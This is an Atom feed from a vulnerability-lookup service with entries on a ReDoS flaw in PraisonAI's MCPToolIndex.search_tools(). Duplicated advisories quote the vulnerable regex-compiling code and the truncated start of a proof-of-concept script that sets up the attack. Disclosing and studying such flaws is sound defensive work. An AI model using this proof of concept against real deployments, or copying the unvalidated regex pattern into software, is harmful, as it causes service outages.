<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-09T15:44:12.480342+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-280513</id>
    <title>EUVD-2026-280513</title>
    <updated>2026-10-09T15:44:12.483255+00:00</updated>
    <content>EUVD-2026-280513</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-280513"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-34939</id>
    <title>fkie_cve-2026-34939</title>
    <updated>2026-10-09T15:44:12.483299+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>PraisonAI is a multi-agent teams system. Prior to version 4.5.90, MCPToolIndex.search_tools() compiles a caller-supplied string directly as a Python regular expression with no validation, sanitization, or timeout. A crafted regex causes catastrophic backtracking in the re engine, blocking the Python thread for hundreds of seconds and causing a complete service outage. This issue has been patched in version 4.5.90.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-34939"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-8w9j-hc3g-3g7f</id>
    <title>GHSA-8w9j-hc3g-3g7f — PraisonAI Has ReDoS via Unvalidated User-Controlled Regex in MCPToolIndex.search_tools()</title>
    <updated>2026-10-09T15:44:12.483333+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: praisonai</p>
<p>### Summary</p>
<p>`MCPToolIndex.search_tools()` compiles a caller-supplied string directly as a Python regular expression with no validation, sanitization, or timeout. A crafted regex causes catastrophic backtracking in the `re` engine, blocking the Python thread for hundreds of seconds and causing a complete service outage.</p>
<p>### Details</p>
<p>`tool_index.py:365` (source) -&gt; `tool_index.py:368` (sink)
```python
# source -- query taken directly from caller, no validation
def search_tools(self, query: str) -&gt; List[ToolInfo]:
    import re</p>
<p># sink -- compiled and applied with no timeout or exception handling
    pattern = re.compile(query, re.IGNORECASE)
    for tool in self.get_all_tools():
        if pattern.search(tool.name) or pattern.search(tool.hint):
            matches.append(tool)
```</p>
<p>### PoC
```python
# tested on: praisonai==1.5.87 (source install)
# install: pip install -e src/praisonai
import sys, time, json
sys.path.insert(0, 'src/praisonai')
from pathlib import Path</p>
<p>mcp_dir = Path.home() / '.praison' / 'mcp' / 'servers' / 'test_server'
mcp_dir.mkdir(parents=True, exist_ok=True)
(mcp_dir / '_index.json').write_text(json.dumps([
    {"name": "a" * 30 + "!", "hint": "a" * 30 + "!", "server": "test_server"}
]))
(mcp_dir / '_status.json').write_text(json.dumps({
    "server": "test_server", "available": True, "auth_required": False,
    "last_sync": time.time(), "tool_count": 1, "error": None
}))</p>
<p>from praisonai.mcp_server.tool_index import MCPToolIndex
index = MCPToolIndex()…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-8w9j-hc3g-3g7f"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-2907</id>
    <title>PYSEC-2026-2907 — PraisonAI Has ReDoS via Unvalidated User-Controlled Regex in MCPToolIndex.search_tools()</title>
    <updated>2026-10-09T15:44:12.483381+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: praisonai</p>
<p>### Summary</p>
<p>`MCPToolIndex.search_tools()` compiles a caller-supplied string directly as a Python regular expression with no validation, sanitization, or timeout. A crafted regex causes catastrophic backtracking in the `re` engine, blocking the Python thread for hundreds of seconds and causing a complete service outage.</p>
<p>### Details</p>
<p>`tool_index.py:365` (source) -&gt; `tool_index.py:368` (sink)
```python
# source -- query taken directly from caller, no validation
def search_tools(self, query: str) -&gt; List[ToolInfo]:
    import re</p>
<p># sink -- compiled and applied with no timeout or exception handling
    pattern = re.compile(query, re.IGNORECASE)
    for tool in self.get_all_tools():
        if pattern.search(tool.name) or pattern.search(tool.hint):
            matches.append(tool)
```</p>
<p>### PoC
```python
# tested on: praisonai==1.5.87 (source install)
# install: pip install -e src/praisonai
import sys, time, json
sys.path.insert(0, 'src/praisonai')
from pathlib import Path</p>
<p>mcp_dir = Path.home() / '.praison' / 'mcp' / 'servers' / 'test_server'
mcp_dir.mkdir(parents=True, exist_ok=True)
(mcp_dir / '_index.json').write_text(json.dumps([
    {"name": "a" * 30 + "!", "hint": "a" * 30 + "!", "server": "test_server"}
]))
(mcp_dir / '_status.json').write_text(json.dumps({
    "server": "test_server", "available": True, "auth_required": False,
    "last_sync": time.time(), "tool_count": 1, "error": None
}))</p>
<p>from praisonai.mcp_server.tool_index import MCPToolIndex
index = MCPToolIndex()…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-2907"/>
  </entry>
</feed>
